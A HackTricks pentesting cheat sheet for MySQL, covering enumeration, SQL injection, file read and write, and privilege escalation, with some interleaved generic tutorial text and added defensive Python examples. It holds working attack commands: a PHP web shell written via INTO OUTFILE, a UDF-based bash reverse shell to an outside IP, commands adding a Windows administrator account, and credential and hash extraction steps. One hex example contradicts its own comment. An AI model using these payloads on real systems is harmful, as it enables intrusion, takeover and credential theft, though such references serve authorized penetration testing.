hacktricks/network-services-pentesting/pentesting-mysql.md
2023-08-03 19:12:22 +00:00


3306 - Pentesting Mysql

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

RootedCON is one of the most important cybersecurity events in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a meeting point for technology and cybersecurity professionals of every discipline.

{% embed url="https://www.rootedcon.com/" %}

Basic Information

MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). From here.

Default port: 3306

3306/tcp open  mysql

Connect

Local

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Remote

MySQL allows remote connections by default, which means that it can be accessed from other machines on the network. This can be a security risk if proper precautions are not taken.

To secure remote access to MySQL, you can follow these steps:

  1. Bind MySQL to a specific IP address: By default, MySQL listens on all available IP addresses. You can change this by modifying the bind-address parameter in the MySQL configuration file (my.cnf). Set it to the IP address you want MySQL to listen on.
  2. Create a firewall rule: Configure your firewall to only allow incoming connections to the MySQL port (default is 3306) from trusted IP addresses or networks. This will prevent unauthorized access to the MySQL service.
  3. Use strong passwords: Ensure that all MySQL user accounts have strong, unique passwords. Avoid using default or easily guessable passwords.
  4. Limit privileges: Grant only the necessary privileges to MySQL user accounts. Avoid granting unnecessary privileges that could be exploited by an attacker.
  5. Enable SSL/TLS encryption: Configure MySQL to use SSL/TLS encryption for secure communication between the client and the server. This will protect the data transmitted over the network from eavesdropping and tampering.

By following these steps, you can enhance the security of your MySQL server and reduce the risk of unauthorized access or data breaches.

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

External Enumeration

Some of these enumeration actions require valid credentials

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Write any binary data

# unhex() needs an even number of hex digits; an odd-length string makes it return NULL
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL commands

MySQL is a popular open-source relational database management system. It is widely used in web applications and is known for its speed and reliability. In this section, we will explore some commonly used MySQL commands for database management and manipulation.

Connecting to MySQL

To connect to a MySQL server, you can use the following command:

mysql -h <host> -u <username> -p

Replace <host> with the hostname or IP address of the MySQL server and <username> with the username; the -p flag makes the client prompt for the password instead of taking it on the command line.

Creating a Database

To create a new database, use the CREATE DATABASE command:

CREATE DATABASE <database_name>;

Replace <database_name> with the desired name for the database.

Selecting a Database

To select a database to work with, use the USE command:

USE <database_name>;

Replace <database_name> with the name of the database you want to select.

Creating a Table

To create a new table in a database, use the CREATE TABLE command:

CREATE TABLE <table_name> (
    <column1_name> <column1_type>,
    <column2_name> <column2_type>,
    ...
);

Replace <table_name> with the desired name for the table, <column1_name> with the name of the first column, <column1_type> with the data type of the first column, and so on.

Inserting Data

To insert data into a table, use the INSERT INTO command:

INSERT INTO <table_name> (<column1_name>, <column2_name>, ...)
VALUES (<value1>, <value2>, ...);

Replace <table_name> with the name of the table, <column1_name> and <column2_name> with the names of the columns you want to insert data into, and <value1>, <value2>, etc. with the corresponding values.

Querying Data

To retrieve data from a table, use the SELECT command:

SELECT <column1_name>, <column2_name>, ...
FROM <table_name>
WHERE <condition>;

Replace <column1_name>, <column2_name>, etc. with the names of the columns you want to retrieve, <table_name> with the name of the table, and <condition> with the condition that the data must meet.

Updating Data

To update data in a table, use the UPDATE command:

UPDATE <table_name>
SET <column1_name> = <new_value1>, <column2_name> = <new_value2>, ...
WHERE <condition>;

Replace <table_name> with the name of the table, <column1_name>, <column2_name>, etc. with the names of the columns you want to update, <new_value1>, <new_value2>, etc. with the new values, and <condition> with the condition that the data must meet.

Deleting Data

To delete data from a table, use the DELETE FROM command:

DELETE FROM <table_name>
WHERE <condition>;

Replace <table_name> with the name of the table and <condition> with the condition that the data must meet.

Dropping a Database

To drop a database, use the DROP DATABASE command:

DROP DATABASE <database_name>;

Replace <database_name> with the name of the database you want to drop.

Dropping a Table

To drop a table, use the DROP TABLE command:

DROP TABLE <table_name>;

Replace <table_name> with the name of the table you want to drop.

These are just a few of the many commands available in MySQL. By mastering these commands, you will have a solid foundation for managing and manipulating databases using MySQL.

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version; #version (system variable, so no parentheses)
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## You need the FILE privilege to read & write files, and secure_file_priv must allow the path.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL Privilege Enumeration

MySQL is a commonly used relational database management system for storing and managing data. When pentesting MySQL it is important to understand the privilege configuration of the target database. By enumerating MySQL privileges we can determine the privilege level of the current user and look for privilege weaknesses that could be abused.

Here are some common MySQL privilege enumeration techniques:

1. SHOW GRANTS

The SHOW GRANTS statement shows the privileges of the current user, i.e. every privilege the current user has been granted.

SHOW GRANTS;

2. INFORMATION_SCHEMA

MySQL's INFORMATION_SCHEMA database stores metadata about databases, tables, columns and privileges. Query INFORMATION_SCHEMA to obtain detailed privilege information.

SELECT * FROM INFORMATION_SCHEMA.USER_PRIVILEGES;

3. The mysql.user table

The mysql.user table holds the details of MySQL users, including user names, password hashes and privileges. Query it to obtain information about user privileges.

SELECT * FROM mysql.user;

4. SHOW GRANTS FOR

The SHOW GRANTS FOR statement shows the privileges of a given user. Replace <username> with the user to query.

SHOW GRANTS FOR <username>;

5. The mysql.db table

The mysql.db table stores database-level privileges. Query it to obtain information about database privileges.

SELECT * FROM mysql.db;

6. The mysql.tables_priv table

The mysql.tables_priv table stores table-level privileges. Query it to obtain information about table privileges.

SELECT * FROM mysql.tables_priv;

7. The mysql.columns_priv table

The mysql.columns_priv table stores column-level privileges. Query it to obtain information about column privileges.

SELECT * FROM mysql.columns_priv;

Using these MySQL privilege enumeration techniques we can better understand the privilege configuration of the target database and find possible security weaknesses.

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
## Functions not from the sys db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
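The enumeration queries above return raw rows; the following added example (not from the HackTricks page) triages a mysql.user dump for the patterns those queries look for: empty passwords, wildcard hosts, FILE, SUPER and GRANT OPTION. It assumes the tab-separated output of `mysql -e "SELECT user,host,file_priv,super_priv,grant_priv,plugin,authentication_string FROM mysql.user"`; the rows and hash values below are constructed placeholders.

```python
import csv
import io

# Constructed dump in the tab-separated format `mysql -e "SELECT ... FROM mysql.user"` prints.
# The hash values are placeholders, not real hashes.
SAMPLE_DUMP = """\
user\thost\tfile_priv\tsuper_priv\tgrant_priv\tplugin\tauthentication_string
root\tlocalhost\tY\tY\tY\tmysql_native_password\t*CONSTRUCTED_HASH_ROOT
app\t%\tN\tN\tN\tmysql_native_password\t*CONSTRUCTED_HASH_APP
backup\t10.0.0.%\tY\tN\tN\tmysql_native_password\t*CONSTRUCTED_HASH_BACKUP
legacy\t%\tN\tN\tN\tmysql_native_password\t
svc\t%\tN\tY\tY\tauth_socket\t
"""

# Columns the triage needs (see the SELECT in the lead-in).
REQUIRED = ("user", "host", "file_priv", "super_priv", "grant_priv", "plugin", "authentication_string")


def parse_dump(text):
    """Parse the TSV dump into a list of dicts, one per account row."""
    rows = list(csv.DictReader(io.StringIO(text), delimiter="\t"))
    missing = [c for c in REQUIRED if rows and c not in rows[0]]
    if missing:
        raise ValueError(f"dump lacks columns: {missing}")
    return rows


def triage(rows):
    """Return (account, finding) pairs for the privilege patterns enumerated on this page."""
    findings = []
    for r in rows:
        who = f"'{r['user']}'@'{r['host']}'"
        # auth_socket delegates to the OS user, so an empty string there is not a blank password
        if r["authentication_string"] == "" and r["plugin"] != "auth_socket":
            findings.append((who, "empty password"))
        if r["host"] == "%":
            findings.append((who, "may log in from any host"))
        if r["file_priv"] == "Y":
            findings.append((who, "FILE privilege: LOAD_FILE / INTO OUTFILE / INTO DUMPFILE on the server"))
        if r["super_priv"] == "Y" and r["user"] != "root":
            findings.append((who, "SUPER privilege on a non-root account"))
        if r["grant_priv"] == "Y" and r["user"] != "root":
            findings.append((who, "GRANT OPTION: can hand its privileges to other accounts"))
    return findings


def accounts_with(findings, keyword):
    """Distinct accounts whose findings mention `keyword`, e.g. 'FILE'."""
    return sorted({who for who, msg in findings if keyword in msg})


if __name__ == "__main__":
    for who, msg in triage(parse_dump(SAMPLE_DUMP)):
        print(f"{who:24} {msg}")
```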

You can check what each privilege means in the docs: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %} mysql-ssrf.md {% endcontent-ref %}

MySQL arbitrary file read by the client

Actually, when you try to send the contents of a file to a MySQL or MariaDB server by loading data into a table, the server asks the client to read the file and send its contents. So if you can tamper with a MySQL client so that it connects to your own MySQL server, you can read arbitrary files.
Please note that this is the behaviour when using:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

Notice the word "local"
Because without "local" you can get

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Initial PoC: https://github.com/allyshka/Rogue-MySql-Server
In this paper you can see a complete description of the attack and even how to extend it to RCE: https://paper.seebug.org/1113/
Here you can find an overview of the attack: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/
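The attack above works because the server's reply to a query can be a LOCAL INFILE request (a packet whose first payload byte is 0xFB, followed by the file name) and the client obeys it. The following added example (not from the HackTricks page or the linked PoC) parses MySQL packet framing (3-byte little-endian length, 1-byte sequence id, payload) and flags a 0xFB reply that the client's query never asked for, which is how a proxy or sensor can spot a rogue server. The traffic below is constructed.

```python
import re

COM_QUERY = 0x03              # first payload byte of a client query packet
LOCAL_INFILE_REQUEST = 0xFB   # first payload byte of a server "send me this local file" packet

# Quoted file name in a LOAD DATA LOCAL INFILE statement
LOAD_LOCAL_RE = re.compile(
    r"^\s*LOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+'([^']*)'", re.I)


def build_packet(seq, payload):
    """Frame a payload as a MySQL packet (used here only to construct sample traffic)."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def split_packets(stream):
    """Return [(sequence_id, payload), ...] for every complete packet in a byte stream."""
    packets, pos = [], 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) < length:
            break  # truncated packet: wait for more bytes
        packets.append((stream[pos + 3], payload))
        pos += 4 + length
    return packets


def requested_local_file(query_payload):
    """File name the client itself asked to upload, or None if the query is not LOAD DATA LOCAL."""
    if not query_payload or query_payload[0] != COM_QUERY:
        return None
    m = LOAD_LOCAL_RE.match(query_payload[1:].decode("utf-8", "replace"))
    return m.group(1) if m else None


def check_exchange(client_bytes, server_bytes):
    """Return the file the server demands if that demand is unsolicited, else None.

    Unsolicited means: the server sent a 0xFB packet and the client's last query
    either was not LOAD DATA LOCAL INFILE or named a different file.
    """
    client_pkts, server_pkts = split_packets(client_bytes), split_packets(server_bytes)
    if not client_pkts or not server_pkts:
        return None
    _, query = client_pkts[-1]
    _, reply = server_pkts[0]
    if not reply or reply[0] != LOCAL_INFILE_REQUEST:
        return None  # OK, ERR or result set: nothing to flag
    demanded = reply[1:].decode("utf-8", "replace")
    return None if requested_local_file(query) == demanded else demanded


# Constructed traffic: a harmless SELECT answered with a request for /etc/passwd
CLIENT_SELECT = build_packet(0, bytes([COM_QUERY]) + b"select @@version")
ROGUE_REPLY = build_packet(1, bytes([LOCAL_INFILE_REQUEST]) + b"/etc/passwd")
# Constructed legitimate upload and the reply a real server would give for it
CLIENT_LOAD = build_packet(0, bytes([COM_QUERY]) + b"LOAD DATA LOCAL INFILE '/tmp/x.csv' INTO TABLE t")
HONEST_REPLY = build_packet(1, bytes([LOCAL_INFILE_REQUEST]) + b"/tmp/x.csv")

if __name__ == "__main__":
    print(check_exchange(CLIENT_SELECT, ROGUE_REPLY))  # /etc/passwd
    print(check_exchange(CLIENT_LOAD, HONEST_REPLY))   # None
```

On the client side the same class of attack is closed by connecting with local_infile disabled (for the command-line client, `--local-infile=0`).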


POST

Mysql User

It will be very interesting if mysql is running as root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Dangerous Settings of mysqld.cnf

From https://academy.hackthebox.com/module/112/section/1238

| Setting | Description |
|---|---|
| user | Sets which user the MySQL service will run as. |
| password | Sets the password for the MySQL user. |
| admin_address | The IP address on which to listen for TCP/IP connections on the administrative network interface. |
| debug | This variable indicates the current debugging settings (sensitive information within the logs). |
| sql_warnings | This variable controls whether single-row INSERT statements produce an information string if warnings occur (sensitive information within the logs). |
| secure_file_priv | This variable is used to limit the effect of data import and export operations. |
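The remote-hardening steps earlier on the page (bind-address, least privilege) and the dangerous settings in the table above can be checked mechanically. The following added example (not from the HackTricks page or the HTB module) parses MySQL option-file syntax and reports the settings discussed here; both configuration samples are constructed, one weak and one hardened.

```python
# Constructed sample of a weak [mysqld] section; every line below is something the audit flags.
WEAK_CNF = """
[mysqld]
user             = root
bind-address     = 0.0.0.0
local_infile     = 1
secure_file_priv =
general_log      = 1
debug            = d:t:o,/tmp/mysqld.trace

[client]
user     = root
password = s3cret
"""

# Constructed hardened counterpart: service account, loopback only, exports confined to one directory.
HARDENED_CNF = """
[mysqld]
user             = mysql
bind-address     = 127.0.0.1
local_infile     = 0
secure_file_priv = /var/lib/mysql-files
"""


def parse_cnf(text):
    """Parse MySQL option-file syntax into {section: {option: value}}.

    Options may appear without a value (e.g. skip-networking), and MySQL treats
    '-' and '_' in option names as equivalent, so names are normalised to '_'.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower().replace("-", "_")] = value.strip().strip("\"'")
    return sections


def audit(sections):
    """Return (severity, message) findings for the settings discussed on this page."""
    findings = []
    d = sections.get("mysqld", {})
    if d.get("user", "").lower() == "root":
        findings.append(("high", "mysqld runs as root: FILE-privilege or UDF abuse becomes root code execution"))
    if d.get("bind_address", "") in ("", "0.0.0.0", "::", "*") and "skip_networking" not in d:
        findings.append(("medium", "bind-address listens on every interface; pin it to one address or use skip-networking"))
    if d.get("local_infile", "0").lower() in ("1", "on", "true"):
        findings.append(("medium", "local_infile enabled: a rogue server can make clients upload local files"))
    if d.get("secure_file_priv") == "":
        findings.append(("high", "secure_file_priv is empty: LOAD_FILE / INTO OUTFILE are unrestricted"))
    if d.get("general_log", "0").lower() in ("1", "on"):
        findings.append(("low", "general_log on: every statement, credentials included, is written to disk"))
    if "debug" in d:
        findings.append(("low", "debug set: trace output can leak sensitive data"))
    for sec in ("client", "mysql"):
        if "password" in sections.get(sec, {}):
            findings.append(("high", f"[{sec}] stores a plaintext password; anyone who can read the file can log in"))
    return findings


if __name__ == "__main__":
    for sev, msg in audit(parse_cnf(WEAK_CNF)):
        print(f"{sev:6} {msg}")
    print("hardened findings:", audit(parse_cnf(HARDENED_CNF)))
```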

Privilege escalation

# Get current user (and all users) privileges and hashes
use mysql;
select user();
## On MySQL >= 5.7 the hash column is authentication_string instead of password
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, useful for sudo/suid privesc)
\! sh

Privilege Escalation via library

If the mysql server is running as root (or a different, more privileged user) you can make it execute commands. For that, you need to use user defined functions. And to create a user defined function you will need a library for the operating system that is running mysql.

The malicious library to use can be found inside sqlmap and inside metasploit by running locate "*lib_mysqludf_sys*". The .so files are Linux libraries and the .dll are the Windows ones; choose the one you need.

If you don't have those libraries, you can either look for them, or download this Linux C code and compile it inside the Linux vulnerable machine:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Now that you have the library, login inside Mysql as a privileged user (root?) and follow the next steps:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

MySQL can be installed on Windows using the official installer available on the MySQL website. Once installed, the MySQL service will be running in the background.

To connect to the MySQL server on Windows, you can use the MySQL Command Line Client or a graphical user interface (GUI) tool like MySQL Workbench.

To access the MySQL Command Line Client, open the Command Prompt and type mysql -u <username> -p. Replace <username> with the username you want to use to connect to the MySQL server. You will be prompted to enter the password for the specified username.

To use a GUI tool like MySQL Workbench, you will need to download and install it from the MySQL website. Once installed, open MySQL Workbench and click on the "+" icon in the "MySQL Connections" section to create a new connection. Enter the necessary details like the connection name, hostname, port, username, and password, and click "Test Connection" to verify the connection.

Once connected to the MySQL server, you can perform various tasks like creating databases, tables, and executing SQL queries.


# Check the Linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Extracting MySQL credentials from files

Inside /etc/mysql/debian.cnf you can find the plaintext password of the user debian-sys-maint

cat /etc/mysql/debian.cnf

You can use these credentials to login in the mysql database.

Inside the file /var/lib/mysql/mysql/user.MYD you can find all the hashes of the MySQL users (the ones that you can extract from mysql.user inside the database).

You can extract them doing:

# a-Z is not a valid range in most locales; use the explicit a-zA-Z
grep -oaE "[-_\.\*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Enabling logging

You can enable logging of mysql queries inside /etc/mysql/my.cnf by uncommenting the following lines:

Useful files

Configuration Files

  • windows *
    • config.ini
    • my.ini
    • windows\my.ini
    • winnt\my.ini
    • <InstDir>/mysql/data/
  • unix
    • my.cnf
    • /etc/my.cnf
    • /etc/mysql/my.cnf
    • /var/lib/mysql/my.cnf
    • ~/.my.cnf
  • Command History
    • ~/.mysql.history
  • Log Files
    • connections.log
    • update.log
    • common.log

Default MySQL Databases/Tables

{% tabs %} {% tab title="information_schema" %} ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINTS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
KEY_CACHES
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_LOCKS
INNODB_TRX
INNODB_SYS_DATAFILES
INNODB_FT_CONFIG
INNODB_SYS_VIRTUAL
INNODB_CMP
INNODB_FT_BEING_DELETED
INNODB_CMP_RESET
INNODB_CMP_PER_INDEX
INNODB_CMPMEM_RESET
INNODB_FT_DELETED
INNODB_BUFFER_PAGE_LRU
INNODB_LOCK_WAITS
INNODB_TEMP_TABLE_INFO
INNODB_SYS_INDEXES
INNODB_SYS_TABLES
INNODB_SYS_FIELDS
INNODB_CMP_PER_INDEX_RESET
INNODB_BUFFER_PAGE
INNODB_FT_DEFAULT_STOPWORD
INNODB_FT_INDEX_TABLE
INNODB_FT_INDEX_CACHE
INNODB_SYS_TABLESPACES
INNODB_METRICS
INNODB_SYS_FOREIGN_COLS
INNODB_CMPMEM
INNODB_BUFFER_POOL_STATS
INNODB_SYS_COLUMNS
INNODB_SYS_FOREIGN
INNODB_SYS_TABLESTATS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
USER_STATISTICS
INNODB_MUTEXES
TABLE_STATISTICS
INNODB_TABLESPACES_ENCRYPTION
user_variables
INNODB_TABLESPACES_SCRUBBING
INNODB_SYS_SEMAPHORE_WAITS {% endtab %}

{% tab title="mysql" %} columns_priv
column_stats
db
engine_cost
event
func
general_log
gtid_executed
gtid_slave_pos
help_category
help_keyword
help_relation
help_topic
host
index_stats
innodb_index_stats
innodb_table_stats
ndb_binlog_index
plugin
proc
procs_priv
proxies_priv
roles_mapping
server_cost
servers
slave_master_info
slave_relay_log_info
slave_worker_info
slow_log
tables_priv
table_stats
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
transaction_registry
user {% endtab %}

{% tab title="performance_schema" %} accounts
cond_instances
events_stages_current
events_stages_history
events_stages_history_long
events_stages_summary_by_account_by_event_name
events_stages_summary_by_host_by_event_name
events_stages_summary_by_thread_by_event_name
events_stages_summary_by_user_by_event_name
events_stages_summary_global_by_event_name
events_statements_current
events_statements_history
events_statements_history_long
events_statements_summary_by_account_by_event_name
events_statements_summary_by_digest
events_statements_summary_by_host_by_event_name
events_statements_summary_by_program
events_statements_summary_by_thread_by_event_name
events_statements_summary_by_user_by_event_name
events_statements_summary_global_by_event_name
events_transactions_current
events_transactions_history
events_transactions_history_long
events_transactions_summary_by_account_by_event_name
events_transactions_summary_by_host_by_event_name
events_transactions_summary_by_thread_by_event_name
events_transactions_summary_by_user_by_event_name
events_transactions_summary_global_by_event_name
events_waits_current
events_waits_history
events_waits_history_long
events_waits_summary_by_account_by_event_name
events_waits_summary_by_host_by_event_name
events_waits_summary_by_instance
events_waits_summary_by_thread_by_event_name
events_waits_summary_by_user_by_event_name
events_waits_summary_global_by_event_name
file_instances
file_summary_by_event_name
file_summary_by_instance
global_status
global_variables
host_cache
hosts
memory_summary_by_account_by_event_name
memory_summary_by_host_by_event_name
memory_summary_by_thread_by_event_name
memory_summary_by_user_by_event_name
memory_summary_global_by_event_name
metadata_locks
mutex_instances
objects_summary_global_by_type
performance_timers
prepared_statements_instances
replication_applier_configuration
replication_applier_status
replication_applier_status_by_coordinator
replication_applier_status_by_worker
replication_connection_configuration
replication_connection_status
replication_group_member_stats
replication_group_members
rwlock_instances
session_account_connect_attrs
session_connect_attrs
session_status
session_variables
setup_actors
setup_consumers
setup_instruments
setup_objects
setup_timers
socket_instances
socket_summary_by_event_name
socket_summary_by_instance
status_by_account
status_by_host
status_by_thread
status_by_user
table_handles
table_io_waits_summary_by_index_usage
table_io_waits_summary_by_table
table_lock_waits_summary_by_table
threads
user_variables_by_thread
users
variables_by_thread {% endtab %}

{% tab title="sys" %} host_summary
host_summary_by_file_io
host_summary_by_file_io_type
host_summary_by_stages
host_summary_by_statement_latency
host_summary_by_statement_type
innodb_buffer_stats_by_schema
innodb_buffer_stats_by_table
innodb_lock_waits
io_by_thread_by_latency
io_global_by_file_by_bytes
io_global_by_file_by_latency
io_global_by_wait_by_bytes
io_global_by_wait_by_latency
latest_file_io
memory_by_host_by_current_bytes
memory_by_thread_by_current_bytes
memory_by_user_by_current_bytes
memory_global_by_current_bytes
memory_global_total
metrics
processlist
ps_check_lost_instrumentation
schema_auto_increment_columns
schema_index_statistics
schema_object_overview
schema_redundant_indexes
schema_table_lock_waits
schema_table_statistics
schema_table_statistics_with_buffer
schema_tables_with_full_table_scans
schema_unused_indexes
session
session_ssl_status
statement_analysis
statements_with_errors_or_warnings
statements_with_full_table_scans
statements_with_runtimes_in_95th_percentile
statements_with_sorting
statements_with_temp_tables
sys_config
user_summary
user_summary_by_file_io
user_summary_by_file_io_type
user_summary_by_stages
user_summary_by_statement_latency
user_summary_by_statement_type
version
wait_classes_global_by_avg_latency
wait_classes_global_by_latency
waits_by_host_by_latency
waits_by_user_by_latency
waits_global_by_latency
x$host_summary
x$host_summary_by_file_io
x$host_summary_by_file_io_type
x$host_summary_by_stages
x$host_summary_by_statement_latency
x$host_summary_by_statement_type
x$innodb_buffer_stats_by_schema
x$innodb_buffer_stats_by_table
x$innodb_lock_waits
x$io_by_thread_by_latency
x$io_global_by_file_by_bytes
x$io_global_by_file_by_latency
x$io_global_by_wait_by_bytes
x$io_global_by_wait_by_latency
x$latest_file_io
x$memory_by_host_by_current_bytes
x$memory_by_thread_by_current_bytes
x$memory_by_user_by_current_bytes
x$memory_global_by_current_bytes
x$memory_global_total
x$processlist
x$ps_digest_95th_percentile_by_avg_us
x$ps_digest_avg_latency_distribution
x$ps_schema_table_statistics_io
x$schema_flattened_keys
x$schema_index_statistics
x$schema_table_lock_waits
x$schema_table_statistics
x$schema_table_statistics_with_buffer
x$schema_tables_with_full_table_scans
x$session
x$statement_analysis
x$statements_with_errors_or_warnings
x$statements_with_full_table_scans
x$statements_with_runtimes_in_95th_percentile
x$statements_with_sorting
x$statements_with_temp_tables
x$user_summary
x$user_summary_by_file_io
x$user_summary_by_file_io_type
x$user_summary_by_stages
x$user_summary_by_statement_latency
x$user_summary_by_statement_type
x$wait_classes_global_by_avg_latency
x$wait_classes_global_by_latency
x$waits_by_host_by_latency
x$waits_by_user_by_latency
x$waits_global_by_latency {% endtab %} {% endtabs %}

HackTricks Automatic Commands

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.xyz/pentesting/pentesting-mysql

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
